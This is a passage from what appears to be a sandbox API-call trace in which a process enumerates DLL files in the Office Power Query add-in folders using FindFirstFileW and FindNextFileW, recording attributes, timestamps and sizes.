ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bd443f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc2040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.XmlSerializers.dll", cAlternateFileName="MI7AD6~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b87f8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b87f8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.OAuth.dll", cAlternateFileName="MIADE9~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4704e3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4704e3d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf472b09c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.OleDbInterop.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13240, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.OleDbProvider.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6ea9118, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6ea9118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7642a1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23f640, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.ScriptDom.dll", cAlternateFileName="MIC995~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x20aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Storage.XmlSerializers.dll", cAlternateFileName="MID814~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3760836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3760836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x481440, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.dll", cAlternateFileName="MIE629~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x73ee48, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x73ee48, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x73ee48, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14dac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.OData.Core.NetFX35.dll", cAlternateFileName="MIDAD6~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x48f5cfa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x48f5cfa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48f5cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb8058, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.OData.Edm.NetFX35.dll", cAlternateFileName="MIF00B~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b058, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.Excel.dll", cAlternateFileName="MIDE30~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xedac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.Outlook.dll", cAlternateFileName="MIDB50~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Spatial.NetFX35.dll", cAlternateFileName="MI069E~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5e43de4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WindowsAzure.StorageClient.dll", cAlternateFileName="MI3285~1.DLL")) returned 1 [0047.675] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ms", cAlternateFileName="")) returned 1 [0047.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ms\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71b00 [0047.676] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.676] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a2a905, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a2a905, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.676] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.676] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbe60d8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbe60d8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbe60d8f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.677] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x88aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.677] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x88aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.677] FindClose (in: hFindFile=0xf71b00 | out: hFindFile=0xf71b00) returned 1 [0047.677] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.677] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0047.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71fc0 [0047.678] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.678] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.678] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc34bb5b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.678] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b61d36, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.678] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0822be8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0822be8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.678] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0822be8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0822be8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8daa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.679] FindClose (in: hFindFile=0xf71fc0 | out: hFindFile=0xf71fc0) returned 1 [0047.679] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.679] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0047.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71e80 [0047.680] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.680] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4620012, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.680] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4409f1c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4409f1c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.680] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8680a1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.680] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc5ae112, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc5ae112, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5d437d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.680] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc5ae112, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc5ae112, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5d437d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.680] FindClose (in: hFindFile=0xf71e80 | out: hFindFile=0xf71e80) returned 1 [0047.681] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.681] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6daa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office.dll", cAlternateFileName="")) returned 1 [0047.681] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0047.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pl\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71e80 [0047.682] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.682] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c895d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c895d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4caf7cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.682] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x865a7d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.682] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaac403, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaac403, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33aa8, dwReserved0=0x0, dwReserved1=0x0, 